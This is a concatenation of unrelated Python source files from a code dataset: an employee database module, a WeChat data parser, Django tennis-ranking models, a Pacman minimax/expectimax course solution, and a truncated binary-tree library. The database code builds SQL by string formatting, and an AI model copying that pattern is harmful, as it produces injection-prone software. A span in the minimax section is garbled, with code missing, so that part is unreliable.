#\r\n #\r\n #\r\n # employee_data = [(\"A001\",\"F\",\"23\",\"456\",\"Normal\",\"14\",\"30/05/1994\"),\r\n # (\"A221\",\"F\",\"49\",\"458\",\"Normal\",\"244\",\"30/05/1994\"),\r\n # (\"C342\",\"M\",\"50\",\"676\",\"Overweight\",\"300\",\"1/12/1977\"),\r\n # (\"D123\",\"F\",\"55\",\"123\",\"Obesity\",\"600\",\"15/01/1997\")]\r\n\r\n try:\r\n insert_string_1 = \"INSERT INTO employee ({0} ,{1}, {2}, {3}, {4}, {5}, {6}) \"\r\n insert_string_2 = self.format_col(insert_string_1)\r\n insert_string_2 += \"\"\"VALUES (\"{0}\", \"{1}\", \"{2}\", \"{3}\", \"{4}\",\r\n \"{5}\", \"{6}\");\"\"\"\r\n try:\r\n insert_command = insert_string_2.format(data_row[Data.EMPID.name],\r\n data_row[Data.GENDER.name],\r\n data_row[Data.AGE.name],\r\n data_row[Data.SALES.name],\r\n data_row[Data.BMI.name],\r\n data_row[Data.SALARY.name],\r\n data_row[Data.BIRTHDAY.name])\r\n self.cursor.execute(insert_command)\r\n self.conn.commit()\r\n except IndexError as err:\r\n print(err)\r\n return False\r\n\r\n except AttributeError as err:\r\n print(err)\r\n return False\r\n except UnboundLocalError as err:\r\n print(err)\r\n return False\r\n except TypeError as err:\r\n print(err)\r\n return False\r\n return True\r\n\r\n def save(self, data):\r\n for d in data:\r\n self.insert_employee_data(d)\r\n\r\n def read(self):\r\n # Written By Vaishali\r\n #\r\n # This function retrieves all the employee data from the employee table\r\n # in array format; later, in another function,\r\n # the data will be set to the specific format\r\n\r\n data_arr = [] # Retrieve employee data in to data_arr \"array\" format\r\n try:\r\n self.cursor.execute(\"Select * from employee\")\r\n data = self.cursor.fetchall()\r\n for r in data:\r\n data_arr.append({d.name : r[d.value] for d in Data})\r\n\r\n return data_arr\r\n except AttributeError as err:\r\n
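 # (added note) self.cursor is still None when the connection failed, so .execute raises AttributeError\r\n 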
print(err)\r\n return False\r\n\r\n\r\n# db = Database()\r\n# new_data_01 = [{\"EMPID\": \"Y413\", \"GENDER\": \"M\", \"AGE\": 41, \"SALES\": 200,\r\n# \"BMI\": \"Obesity\", \"SALARY\": 450, \"BIRTHDAY\": \"01-09-1977\"}]\r\n# # print(db.save(new_data_01))\r\n# print(db.read())\r\n","sub_path":"src/database_conn.py","file_name":"database_conn.py","file_ext":"py","file_size_in_byte":5300,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"517810611","text":"# coding = utf-8\n# @Time : 2019/08/08\n# @Python : 3.6.1\n# 功能:逆向微信在线人数\n\n\ndef parse_wechat_online(list):\n res = []\n px = int(list[0]) / 1000\n py = int(list[1]) / 1000\n res.append([px, py])\n for i in range(2, len(list), 2):\n dx = int(list[i]) / 1000\n dy = int(list[i + 1]) / 1000\n x = px + dx\n y = py + dy\n res.append([round(x,2),round(y,2)])\n\n px = x\n py = y\n return res\n\nif __name__ == '__main__':\n list = [1,2,3,4,5,6,7,8,9,10]\n result = parse_wechat_online(list)\n print(result)","sub_path":"WeChat/tools/parse_wechat_online.py","file_name":"parse_wechat_online.py","file_ext":"py","file_size_in_byte":576,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"536486880","text":"import re\n\nfrom django.db import models\nfrom django.dispatch import receiver\nfrom django.db.models.signals import post_save\nfrom django.utils.translation import ugettext_lazy as _\n\nfrom locations.models import City\nfrom accounts.models import PlayerProfile\n\n\n\n\nclass Result (models.Model):\n \"\"\"\n Represents the result of a tennis match. There are three\n types of them, and the scores are kept in a comma-separated\n CharField, with a colon between the number of games for each\n player (winner is always first), e.g.:\n \n type=1\n score=\"10:8\"\n \n type=3\n score=\"6:3,4:6,6:1\"\n \n type=5\n score=\"6:1,6:2,6:4\"\n \n \"\"\"\n GAMES_DELIMITER=':'\n SETS_DELIMITER='[\\s,.-]'\n TYPES=((1, _('One set')),\n (3, _('Best of three sets')),\n (5, _('Best of five sets')))\n type = models.PositiveSmallIntegerField (choices=TYPES,\n default=1)\n score = models.CharField (max_length=30)\n \n def get_sets (self):\n \"\"\"\n Returns a list of results per set, e.g.\n \n '6:3,7:6'\n get_sets ( ) -> ['6:3','7:6']\n \"\"\"\n return re.split ('%s*' % Result.SETS_DELIMITER,\n self.score)\n \n def __unicode__ (self):\n return self.score\n \n\nclass SingleMatchManager (models.Manager):\n def get_winner_results (self, player):\n \"\"\"\n Returns a QuerySet with all the matches the player won\n and their results.-\n \"\"\"\n ret_value = SingleMatch.objects.filter (is_challenged=False) \\\n .filter (winner=player)\n return ret_value\n \n def get_loser_results (self, player):\n \"\"\"\n Returns a QuerySet with all the matches the user lost\n and their results.-\n \"\"\"\n ret_value = SingleMatch.objects.filter (is_challenged=False) \\\n .filter (loser=player)\n return ret_value\n \n def get_results (self, user):\n \"\"\"\n Returns a QuerySet with all the matches and their results\n for the user 'user'.-\n \"\"\"\n if PlayerProfile.objects.filter (user=user):\n player = PlayerProfile.objects.get (user=user)\n ret_value = SingleMatch.objects.get_winner_results (player)\n ret_value |= SingleMatch.objects.get_loser_results (player)\n else:\n ret_value = SingleMatch.objects.none ( )\n return ret_value\n\n\n\nclass SingleMatch (models.Model):\n \"\"\"\n Represents a match between two players.-\n \"\"\"\n winner = models.ForeignKey (PlayerProfile,\n 
related_name='winner')\n loser = models.ForeignKey (PlayerProfile,\n related_name='loser')\n result = models.ForeignKey (Result,\n unique=True)\n date = models.DateField (null=True,\n blank=True)\n city = models.ForeignKey (City,\n null=True,\n blank=True)\n is_challenged = models.BooleanField (default=False)\n objects = SingleMatchManager ( )\n \n def __unicode__ (self):\n return '%s %s %s %s' % (self.winner.user.username,\n _('won'),\n self.loser.user.username,\n self.result)\n\n\n\nclass Ranking (models.Model):\n \"\"\"\n Represents the players' ranking.-\n \"\"\"\n player = models.ForeignKey (PlayerProfile,\n unique=True)\n points = models.PositiveIntegerField (default = 0)\n \n def __unicode__ (self):\n return \"%s %s\" % (self.player.user_profile.user.username,\n self.points)\n\n\n\n@receiver(post_save, sender=SingleMatch)\ndef calculate_ranking (sender, instance, created, **kwargs):\n \"\"\"\n Callback function called whenever a new match result is created.\n It (re)calculates the points earned by each player who has entered\n any match results.-\n \"\"\"\n #\n # Make sure a new match results has been inserted\n #\n if (created):\n #\n # recalculate points for theses players\n #\n players = [instance.winner,\n instance.loser]\n for p in players:\n points = 0\n matches = SingleMatch.objects.get_winner_results (p)\n \n for m in matches:\n for s in m.result.get_sets ( ):\n points += int (re.split (Result.GAMES_DELIMITER, s)[0])\n #\n # recalculate points for the matches lost\n #\n matches = SingleMatch.objects.get_loser_results (p)\n \n for m in matches:\n for s in m.result.get_sets ( ):\n points += int (re.split (Result.GAMES_DELIMITER, s)[1])\n #\n # Try to find a ranking entry for this player\n #\n r = Ranking.objects.filter (player=p)\n if not r:\n r = Ranking ( )\n r.player = p\n else:\n r = r[0]\n r.points = points\n r.save ( )\n ","sub_path":"ranking/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":5246,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"9752779","text":"# multiAgents.py\n# --------------\n# Licensing Information: You are free to use or extend these projects for\n# educational purposes provided that (1) you do not distribute or publish\n# solutions, (2) you retain this notice, and (3) you provide clear\n# attribution to UC Berkeley, including a link to http://ai.berkeley.edu.\n# \n# Attribution Information: The Pacman AI projects were developed at UC Berkeley.\n# The core projects and autograders were primarily created by John DeNero\n# (denero@cs.berkeley.edu) and Dan Klein (klein@cs.berkeley.edu).\n# Student side autograding was added by Brad Miller, Nick Hay, and\n# Pieter Abbeel (pabbeel@cs.berkeley.edu).\n\n\nfrom util import manhattanDistance, PriorityQueue\nfrom game import Directions\nimport random, util\n\nfrom game import Agent\nfrom searchAgents import mazeDistance\n\nclass bcolors:\n HEADER = '\\033[95m'\n OKBLUE = '\\033[94m'\n OKGREEN = '\\033[92m'\n WARNING = '\\033[93m'\n FAIL = '\\033[91m'\n ENDC = '\\033[0m'\n BOLD = '\\033[1m'\n UNDERLINE = '\\033[4m'\n\nclass ReflexAgent(Agent):\n \"\"\"\n A reflex agent chooses an action at each choice point by examining\n its alternatives via a state evaluation function.\n\n The code below is provided as a guide. 
You are welcome to change\n it in any way you see fit, so long as you don't touch our method\n headers.\n \"\"\"\n\n\n def getAction(self, gameState):\n \"\"\"\n You do not need to change this method, but you're welcome to.\n\n getAction chooses among the best options according to the evaluation function.\n\n Just like in the previous project, getAction takes a GameState and returns\n some Directions.X for some X in the set {NORTH, SOUTH, WEST, EAST, STOP}\n \"\"\"\n # Collect legal moves and successor states\n legalMoves = gameState.getLegalActions()\n\n # Choose one of the best actions\n # print('+++++++++++++++++++++++++++++++++')\n # print('current pos ', gameState.getPacmanPosition(), 'ghost positions ', gameState.getGhostPositions())\n scores = [self.evaluationFunction(gameState, action) for action in legalMoves]\n bestScore = max(scores)\n bestIndices = [index for index in range(len(scores)) if scores[index] == bestScore]\n chosenIndex = random.choice(bestIndices) # Pick randomly among the best\n\n \"Add more of your code here if you want to\"\n # print(bcolors.OKBLUE, ' chosen move ', legalMoves[chosenIndex], 'best scores ', bestScore, bcolors.ENDC)\n # print('+++++++++++++++++++++++++++++++++')\n\n return legalMoves[chosenIndex]\n\n def evaluationFunction(self, currentGameState, action):\n \"\"\"\n Design a better evaluation function here.\n\n The evaluation function takes in the current and proposed successor\n GameStates (pacman.py) and returns a number, where higher numbers are better.\n\n The code below extracts some useful information from the state, like the\n remaining food (newFood) and Pacman position after moving (newPos).\n newScaredTimes holds the number of moves that each ghost will remain\n scared because of Pacman having eaten a power pellet.\n\n Print out these variables to see what you're getting, then combine them\n to create a masterful evaluation function.\n \"\"\"\n # Useful information you can extract from a GameState (pacman.py)\n successorGameState = currentGameState.generatePacmanSuccessor(action)\n newPos = successorGameState.getPacmanPosition()\n newFood = successorGameState.getFood()\n newGhostStates = successorGameState.getGhostStates()\n newScaredTimes = [ghostState.scaredTimer for ghostState in newGhostStates]\n newGhostPositions = successorGameState.getGhostPositions()\n score = 0 # 100*len(newGhostStates)\n for pos in newGhostPositions:\n distFromGhost = manhattan_dist(newPos, pos)\n distFromGhost +=0.01 # avoid 0 division\n # print('distFromGhost ', distFromGhost)\n if distFromGhost <=4:\n score -= 200/distFromGhost\n # break\n pq = PriorityQueue()\n for foodPos in newFood.asList():\n dist = manhattan_dist(newPos, foodPos)\n # print(bcolors.WARNING,' distFromFood ', dist, ' at', foodPos, bcolors.ENDC)\n dist += 0.01\n pq.push(dist, dist)\n\n # if dist<=4:\n # print(bcolors.WARNING,' distFromFood ', dist, bcolors.ENDC)\n # score += 100/dist\n\n while pq.isEmpty() is False:\n dist = pq.pop()\n # print(bcolors.WARNING, ' distFromFood ', dist, bcolors.ENDC)\n score += 100/dist\n\n # score += 500/(newFood.count()+0.1)\n if currentGameState.getFood().count()>successorGameState.getFood().count():\n # print(bcolors.BOLD, 'Will get food', bcolors.ENDC)\n score += 200\n\n \"*** YOUR CODE HERE ***\"\n # print(action, newPos, newFood.count(), newGhostPositions, newScaredTimes, ' score ', score)\n return score # successorGameState.getScore()\n\ndef manhattan_dist(p,q):\n return abs(p[0]-q[0]) + abs(p[1]-q[1])\n\ndef scoreEvaluationFunction(currentGameState):\n 
\"\"\"\n This default evaluation function just returns the score of the state.\n The score is the same one displayed in the Pacman GUI.\n\n This evaluation function is meant for use with adversarial search agents\n (not reflex agents).\n \"\"\"\n return currentGameState.getScore()\n\nclass MultiAgentSearchAgent(Agent):\n \"\"\"\n This class provides some common elements to all of your\n multi-agent searchers. Any methods defined here will be available\n to the MinimaxPacmanAgent, AlphaBetaPacmanAgent & ExpectimaxPacmanAgent.\n\n You *do not* need to make any changes here, but you can if you want to\n add functionality to all your adversarial search agents. Please do not\n remove anything, however.\n\n Note: this is an abstract class: one that should not be instantiated. It's\n only partially specified, and designed to be extended. Agent (game.py)\n is another abstract class.\n \"\"\"\n\n def __init__(self, evalFn = 'scoreEvaluationFunction', depth = '2'):\n self.index = 0 # Pacman is always agent index 0\n self.evaluationFunction = util.lookup(evalFn, globals())\n self.depth = int(depth)\n\nclass MinimaxAgent(MultiAgentSearchAgent):\n \"\"\"\n Your minimax agent (question 2)\n \"\"\"\n # def minAgent(self, gameState, agentIndex, depth):\n # if depth>self.depth:\n # if\n # v = float('inf')\n # legalMoves = gameState.getLegalActions(agentIndex)\n # nextMove = 'Stop'\n # for move in legalMoves:\n # nextState = gameState.generateSuccessor(agentIndex, move)\n # # v = min(v, self.evaluationFunction(nextState))\n # newValue = self.evaluationFunction(nextState)\n # if newValue= 1\n\n gameState.generateSuccessor(agentIndex, action):\n Returns the successor game state after an agent takes an action\n\n gameState.getNumAgents():\n Returns the total number of agents in the game\n\n gameState.isWin():\n Returns whether or not the game state is a winning state\n\n gameState.isLose():\n Returns whether or not the game state is a losing state\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n # legalMoves = gameState.getLegalActions()\n # for agentIndex in gameState.getnumAgents():\n # scores = [self.evaluationFunction(gameState.generateSuccessor(agentIndex, action)) for action in legalMoves]\n # bestScore = max(scores)\n # bestIndices = [index for index in range(len(scores)) if scores[index] == bestScore]\n # chosenIndex = random.choice(bestIndices)\n depth = 0\n agent = 0\n score, move = self.minimaxSearch(gameState, depth, agent)\n\n return move\n # util.raiseNotDefined()\n\n def minimaxSearch(self, state, depth, agent):\n # returns [score, move]\n if depth is self.depth or state.isWin() or state.isLose():\n # print(depth, self.depth)\n return [self.evaluationFunction(state), None]\n\n # if agent%state.getNumAgents() is 0:\n # # agentType = 'MAX'\n # # else:\n # # agentType = 'MIN'\n agent = agent%state.getNumAgents()\n\n if agent is 0: # pacman\n # '''max agent'''\n # maxAgent(state, depth)\n v = [-float(\"inf\"), None]\n # legalMoves = gameState.getLegalActions(0)\n # for move in legalMoves:\n # nextState = gameState.generateSuccessor(0, move)\n # score, move = self.minimaxSearch(state=nextState, depth=depth, agent='MIN')\n # if score>v[0]:\n # v = [score, move]\n else:\n # '''min agent'''\n v = [float(\"inf\"), None]\n # minAgent(state, depth)\n # for agent in range(gameState.getNumAgents()):\n legalMoves = state.getLegalActions(agent)\n # print('agent ', agent, 'legalMoves ', legalMoves)\n if agent==state.getNumAgents()-1:\n depth+=1\n for move in legalMoves:\n nextState = state.generateSuccessor(agent, 
 nextState = state.generateSuccessor(agent, move)\n score, moveReturned = self.minimaxSearch(state=nextState, depth=depth, agent=agent+1)\n if agent == 0:\n if score>v[0]:\n v = [score, move]\n else:\n if score<v[0]:\n v = [score, move]\n\n return v\n\nclass AlphaBetaAgent(MultiAgentSearchAgent):\n \"\"\"\n Your minimax agent with alpha-beta pruning (question 3)\n \"\"\"\n\n def getAction(self, gameState):\n \"\"\"\n Returns the minimax action using self.depth and self.evaluationFunction\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n depth = 0\n agent = 0\n alphabeta = [-float(\"inf\")] + [float(\"inf\")]*(gameState.getNumAgents()-1)\n score, move = self.AlphaBetaSearch(state=gameState, depth=depth, agent=agent, alphabeta=alphabeta)\n return move\n\n def AlphaBetaSearch(self, state, depth, agent, alphabeta):\n # returns [score, move]\n if depth == self.depth or state.isWin() or state.isLose():\n return [self.evaluationFunction(state), None]\n\n agent = agent%state.getNumAgents()\n\n if agent == 0: # pacman\n # '''max agent'''\n v = [-float(\"inf\"), None]\n # if score>v[0]:\n # v = [score, move]\n else:\n # '''min agent'''\n v = [float(\"inf\"), None]\n # minAgent(state, depth)\n # for agent in range(gameState.getNumAgents()):\n legalMoves = state.getLegalActions(agent) # find the moves to take\n # print('agent ', agent, 'legalMoves ', legalMoves)\n if agent==state.getNumAgents()-1:\n depth+=1\n # print(bcolors.OKBLUE, 'agent ', agent, 'legalMoves ', legalMoves, bcolors.ENDC)\n for move in legalMoves:\n # print(bcolors.FAIL, 'agent ', agent, 'move ', move, 'ENTER', bcolors.ENDC)\n nextState = state.generateSuccessor(agent, move) # get the state after making the move\n score, moveReturned = self.AlphaBetaSearch(state=nextState, depth=depth, agent=agent+1, alphabeta=alphabeta[:]) # find the value from the new state\n # print(bcolors.FAIL, 'agent ', agent, 'move ', move, 'score ', score, 'bestScore ', v[0], 'alphabeta ', alphabeta, bcolors.ENDC)\n if agent == 0:\n if score>v[0]: # if this state's value is greater than previous value for this turn i.e. best move\n v = [score, move]\n if v[0]>alphabeta[0]: # if the current value is greater than previous best solution for MAX player\n alphabeta[0] = v[0]\n # print('alphabeta[{0}] {1}' .format(agent, alphabeta[agent]))\n # alphabeta[0] = max(v[0],alphabeta[0])\n if alphabeta[0]> min(alphabeta[1:]): # if the current value is greater than MIN player's best possible value\n # if alpha value is greater than beta value of any agent, rest of the solution isn't worth exploring\n # print('alphabeta[0]> alphabeta[agent+1]: ', alphabeta[0], alphabeta[agent+1])\n break\n\n else:\n if score<v[0]: # if this state's value is lesser than previous value for this turn i.e. best move\n v = [score, move]\n if v[0]<alphabeta[agent]: # if the current value is lesser than previous best solution for this MIN player\n alphabeta[agent] = v[0]\n if alphabeta[0]>alphabeta[agent]: # if the current value is lesser than MAX player's best possible value\n # print('alphabeta[0]>alphabeta[agent]: ', alphabeta[0], alphabeta[agent])\n break\n # alphabeta[agent] = min(v[0], alphabeta[agent])\n\n # print(bcolors.FAIL, 'agent ', agent, 'v ', v, 'EXIT', bcolors.ENDC)\n return v\n\nclass ExpectimaxAgent(MultiAgentSearchAgent):\n \"\"\"\n Your expectimax agent (question 4)\n \"\"\"\n\n def getAction(self, gameState):\n \"\"\"\n Returns the expectimax action using self.depth and self.evaluationFunction\n\n All ghosts should be modeled as choosing uniformly at random from their\n legal moves.\n \"\"\"\n \"*** YOUR CODE HERE ***\"\n depth = 0\n agent = 0\n score, move = self.ExpectimaxSearch(state=gameState, depth=depth, agent=agent)\n # util.raiseNotDefined()\n return move\n\n def ExpectimaxSearch(self, state, depth, agent):\n # returns [score, move]\n if depth == self.depth or state.isWin() or state.isLose():\n # print(depth, self.depth)\n return [self.evaluationFunction(state), None]\n\n agent = agent%state.getNumAgents()\n\n if agent == 0: # pacman\n # '''max agent'''\n v = [-float(\"inf\"), None]\n else:\n # '''min agent'''\n v = [0, None]\n\n legalMoves = state.getLegalActions(agent) # find the moves to take\n if agent==state.getNumAgents()-1:\n depth+=1\n # print(bcolors.OKBLUE, 'agent ', agent, 'legalMoves ', legalMoves, bcolors.ENDC)\n for move in legalMoves:\n # print(bcolors.FAIL, 'agent ', agent, 'move ', move, 'ENTER', bcolors.ENDC)\n nextState = state.generateSuccessor(agent, move) # get the state after making the move\n score, moveReturned = self.ExpectimaxSearch(state=nextState, depth=depth, agent=agent+1) # find the value from the new state\n # print(bcolors.FAIL, 'agent ', agent, 'move ', move, 'score ', score, 'bestScore ', v[0], bcolors.ENDC)\n
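 # (added note) unlike minimax, a ghost's value below is the average of its children, since ghosts are modeled as uniformly random\n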
 if agent == 0:\n if score>v[0]: # if this state's value is greater than previous value for this turn i.e. best move\n v = [score, move]\n # if v[0]>alphabeta[0]: # if the current value is greater than previous best solution for MAX player\n # alphabeta[0] = v[0]\n # # print('alphabeta[{0}] {1}' .format(agent, alphabeta[agent]))\n # # alphabeta[0] = max(v[0],alphabeta[0])\n # if alphabeta[0]> min(alphabeta[1:]): # if the current value is greater than MIN player's best possible value\n # # if alpha value is greater than beta value of any agent, rest of the solution isn't worth exploring\n # # print('alphabeta[0]> alphabeta[agent+1]: ', alphabeta[0], alphabeta[agent+1])\n # break\n\n else:\n v[0] += score/len(legalMoves)\n # if score<v[0]: # if this state's value is lesser than previous value for this turn i.e. best move\n # v = [score, move]\n # if v[0]<alphabeta[agent]: # if the current value is lesser than previous best solution for this MIN player\n # alphabeta[agent] = v[0]\n # if alphabeta[0]>alphabeta[agent]: # if the current value is lesser than MAX player's best possible value\n # # print('alphabeta[0]>alphabeta[agent]: ', alphabeta[0], alphabeta[agent])\n # break\n # alphabeta[agent] = min(v[0], alphabeta[agent])\n\n # print(bcolors.FAIL, 'agent ', agent, 'v ', v, 'EXIT', bcolors.ENDC)\n return v\n\ndef betterEvaluationFunction(currentGameState):\n \"\"\"\n Your extreme ghost-hunting, pellet-nabbing, food-gobbling, unstoppable\n evaluation function (question 5).\n\n DESCRIPTION: penalizes proximity to active ghosts, rewards scared-ghost\n timers, nearby food, capsule proximity and a shrinking food count, and\n adds a small random term to break ties.\n \"\"\"\n # value = 0\n \"*** YOUR CODE HERE ***\"\n legalActions = currentGameState.getLegalActions()\n # print('legalActions ', legalActions)\n # # for action in legalActions:\n # successorGameState = currentGameState.generatePacmanSuccessor(action) # TODO what actions to take\n successorGameState = currentGameState\n newPos = successorGameState.getPacmanPosition()\n newFood = successorGameState.getFood()\n newGhostStates = successorGameState.getGhostStates()\n newScaredTimes = [ghostState.scaredTimer for ghostState in newGhostStates]\n newGhostPositions = successorGameState.getGhostPositions()\n newCapsules = successorGameState.getCapsules()\n # print(newGhostPositions, newScaredTimes)\n score = 0 # 100*len(newGhostStates)\n for i in range(len(newGhostPositions)):\n pos = newGhostPositions[i]\n if newScaredTimes[i] == 0:\n distFromGhost = manhattan_dist(newPos, pos)\n distFromGhost += 0.01 # avoid 0 division\n # print('distFromGhost ', distFromGhost)\n if distFromGhost <= 4:\n score -= 50 / distFromGhost\n else:\n score -= 30/distFromGhost\n # else:\n # print(bcolors.OKGREEN, 'Ghost scared!', bcolors.ENDC)\n # score += 50*newScaredTimes[i]\n # print('score += 10*(sum(newScaredTimes)>0)')\n score += 10*(sum(newScaredTimes))\n # break\n pq = PriorityQueue()\n for foodPos in newFood.asList():\n dist = manhattan_dist(newPos, foodPos)\n # print(bcolors.WARNING,' distFromFood ', dist, ' at', foodPos, bcolors.ENDC)\n dist += 0.01\n pq.push([dist, foodPos], dist)\n\n # if dist<=4:\n # print(bcolors.WARNING,' distFromFood ', dist, bcolors.ENDC)\n # score += 100/dist\n\n # while pq.isEmpty() is False: # for all foods\n # dist = 0\n # if pq.isEmpty() is False:\n # dist = mazeDistance(newPos, pq.pop()[1], successorGameState)\n # # print(bcolors.WARNING, ' distFromFood ', dist, bcolors.ENDC)\n # score += 100/(dist+0.1)\n\n dist = 0\n while pq.isEmpty() is False: # for nearest food\n dist += pq.pop()[0]\n\n score += 80 / (dist+0.1)\n\n # print(str(successorGameState.getCapsules()))\n # print('len(newCapsules)', len(newCapsules))\n if sum(newScaredTimes) == 0:\n dist = 0\n for capsule in newCapsules:\n dist += manhattan_dist(newPos, capsule)\n # print(bcolors.BOLD, 'dist from capsule', dist, bcolors.ENDC)\n score += 50/(dist+0.1)\n\n # score += 
50/(len(newCapsules)+0.1)\n # score += 100/successorGameState.getCapsule().count()\n\n score += 700/(newFood.count()+0.1)\n # for action in legalActions:\n # successorGameState = currentGameState.generatePacmanSuccessor(action)\n # if currentGameState.getFood().count() > successorGameState.getFood().count():\n # # print(bcolors.BOLD, 'Will get food', bcolors.ENDC)\n # score += 200\n\n # value += score/len(legalActions)\n # print('score ', score) # , 'value ', value)\n # score += 5*random.choice(range(2))\n score += 5*random.random()\n\n # print(action, newPos, newFood.count(), newGhostPositions, newScaredTimes, ' score ', score)\n return score # successorGameState.getScore()\n # util.raiseNotDefined()\n\ndef euclidian_dist(p, q):\n x = p[0]-q[0]\n y = p[1]-q[1]\n dist = x*x + y*y\n return dist\n# Abbreviation\nbetter = betterEvaluationFunction\n","sub_path":"submitted_729007628/multiAgents.py","file_name":"multiAgents.py","file_ext":"py","file_size_in_byte":22203,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"64"} +{"seq_id":"241896845","text":"\"\"\"\na helper library providing a number of fundamental tree data structures,\nultimately intended to improve performance in L{SimpleStringTree}. These data\nstructures are sufficiently generic that they might also be of use for other\npurposes.\n\"\"\"\n\nclass Node:\n \"\"\"\n Node represents a node in a binary tree. It is entirely passive, acting\n as a container much a like a C struct. Its unusual features include a\n distinction between annotation and value, and references not only to its children\n but also to its parent.\n \"\"\"\n parent = None\n \"\"\"\n @ivar: The parent of the node, or None if the node has no parent\n @type: L{Node}\n \"\"\"\n leftchild = None\n \"\"\"\n @ivar: The left child of the node, or None if the node has no left child\n @type: L{Node}\n \"\"\"\n rightchild = None\n \"\"\"\n @ivar: The right child of the node, or None if the node has no right child\n @type: L{Node}\n \"\"\"\n annotation = None\n \"\"\"\n @ivar: A piece of data associated with a node, assigned by a\n tree-specific function and satisfying a related constraint.\n @type: tree-specific type\n \"\"\"\n value = None\n \"\"\"\n @ivar: A value assigned by the user of the tree. In monoid-annotated\n trees, only the leaves typically have values, and internal nodes will\n therefore have a value of None.\n The purpose of\n the annotation is to permit the construction of monoid-annotated trees,\n which often have both highly constrained annotations and completely\n unconstrained values.\n See, for example,\n U{http://scienceblogs.com/goodmath/2009/05/finally_finger_trees.php}.\n Non-monoid-annotated trees may ignore this variable.\n @type: typically unconstrained\n \"\"\"\n\nclass AANode(Node):\n \"\"\"\n An AANode is a L{Node} that can be used in an AA tree. AA trees require\n that each node have an associated level.\n \"\"\"\n level = 1\n \"\"\"\n @ivar: The level index for the node. For more information on the level\n in AA trees, see U{http://en.wikipedia.org/wiki/AA_tree}.\n @type: int\n \"\"\"\n\nclass Walker:\n \"\"\"\n A Walker walks up and down trees according to a specific objective. 
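It inspects one node at a time and reports which way to move next. 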
Its\n goal is typically to find some particular element, such as the element\n at a specific index, or with a specific value.\n \n Walker is an abstract base class.\n \"\"\"\n def descend(self, node):\n \"\"\"\n @type node: Node\n @param node: A node from which to descend.\n @rtype: int\n @return: descend must return 0 if the node in question is the one desired,\n -1 if the left child would be better, or 1 if the right child would be\n better.\n \"\"\"\n raise NotImplementedError\n def prepare_descend(self, *args):\n \"\"\"An optional method to prepare for descent\"\"\"\n raise NotImplementedError\n def ascend(self, node):\n \"\"\"\n @type node: Node\n @param node: A node from which to ascend\n @rtype: bool\n @return: ascend should return True iff it should run again on the parent\n of node. It should set the walker's internal state such that a\n subsequent descent would retrace these steps.\"\"\"\n raise NotImplementedError\n def prepare_ascend(self, *args): \n \"\"\" An optional method to prepare for ascent\"\"\"\n raise NotImplementedError\n\nclass SearchWalker(Walker):\n \"\"\"\n A L{Walker} that can be used to search a classic binary tree. This class\n exists solely to expose the concept of the Walker. As a convention, the\n binary tree being searched must satisfy::\n leftchild.annotation < annotation < rightchild.annotation\n \"\"\"\n val = 0\n compare = cmp\n def prepare_descend(self, val, comparator=cmp):\n self.val = val\n self.compare = comparator\n def descend(self, node):\n x = self.compare(node.annotation, self.val)\n return x\n def ascend(self, node):\n self.val = node.annotation\n return False\n\nclass RandomWalker(Walker):\n \"\"\"\n An experimental Walker that could be used to select a random\n sub-leaf position in a binary tree. ascent is not implemented.\n \"\"\"\n def prepare_descend(self):\n from random import choice\n self.choice = choice\n def descend(self, node):\n return self.choice((-1,1))\n\ndef descend(node, walker): #move down from a root node\n \"\"\"\n @type node: L{Node}\n @param node: A node from which to start descent\n @type walker: L{Walker}\n @param walker: A L{Walker} to apply recursively from node.\n @rtype: tuple(L{Node}, int)\n @return: If the L{Walker} accepted a L{Node} n, the function\n returns (n, 0). Otherwise, the function returns (L, 1), or (L, -1),\n where L is a node that has no right or left child, respectively.\n These return values typically indicate that the walker is looking for a\n node that is not present in the tree, but, if it were present, would be\n in the (currently empty) subtree right (or left) of L.\n \"\"\"\n x = walker.descend(node)\n while x != 0:\n if x == 1:\n if node.rightchild is None:\n return (node, 1)\n else:\n node = node.rightchild\n else: #x == -1\n if node.leftchild is None:\n return (node, -1)\n else:\n node = node.leftchild\n x = walker.descend(node)\n return (node, 0)\n \ndef ascend(node, walker):\n \"\"\"\n @type node: L{Node}\n @type walker: L{Walker}\n @param node: the L{Node} from which to ascend.\n @param walker: The L{walker} with which to ascend.\n @rtype: None\n ascend causes walker to ascend until walker asks to stop or the tree's\n root node is reached. Nothing is returned; instead, state is accumulated\n inside the walker\n \"\"\"\n while node is not None and walker.ascend(node):\n node = node.parent\n\ndef search(root, val):\n \"\"\"\n @type root: L{Node}\n @type val: comparable\n Searches a correctly sorted binary tree, starting with the root Node, for\n val. 
Returns a node that contains val if val is present, otherwise a node\n for which val would be an acceptable child value.\n \n Provided solely as an example.\"\"\"\n w = SearchWalker()\n w.prepare_descend(val)\n return descend(root, w)\n \ndef findmin(root):\n \"\"\"\n Simple search function for the leftmost element in a tree, or subtree.\n @type root: L{Node}\n @param root: The node from which to start walking.\n @rtype: L{Node}\n @return: the leftmost element in the subtree of root\n \"\"\"\n while root.leftchild is not None:\n root = root.leftchild\n return root\n\ndef findmax(root):\n \"\"\"\n Simple search function for the rightmost element in a tree, or subtree.\n @type root: L{Node}\n @param root: The node from which to start walking.\n @rtype: L{Node}\n @return: the rightmost element in the subtree of root\n \"\"\"\n while root.rightchild is not None:\n root = root.rightchild\n return root\n\nclass MonoidTree:\n \"\"\"\n A Monoid Annotation Tree is a binary tree whose nodes are each annotated\n by values from some monoid. The annotation of an internal node is computed\n by applying the operation to the annotations of its children. The annotation of a leaf\n node is specified by the user. Every node must either have two children or\n be a leaf node.\n\n Each leaf node may also be associated with an arbitrary opaque value of the user's\n choosing. This node and value will remain associated.\"\"\"\n makenode = Node\n \"\"\"\n @cvar: a factory function that returns nodes of the type required\n for this tree. It is provided so that subclasses can easily override it\n to use subtypes of L{Node}.\n \"\"\"\n def __init__(self, operation, rootnode):\n \"\"\"\n Let M be the monoid type.\n @type operation: f(M,M) -> M\n @param operation: a function taking two arguments from the monoid set\n and returning another element from the monoid set. The monoid\n operation must obey an associativity criterion; see U{http://en.wikipedia.org/wiki/Monoid#Definition}.\n @type rootnode: L{makenode}\n @param rootnode: The root node for the 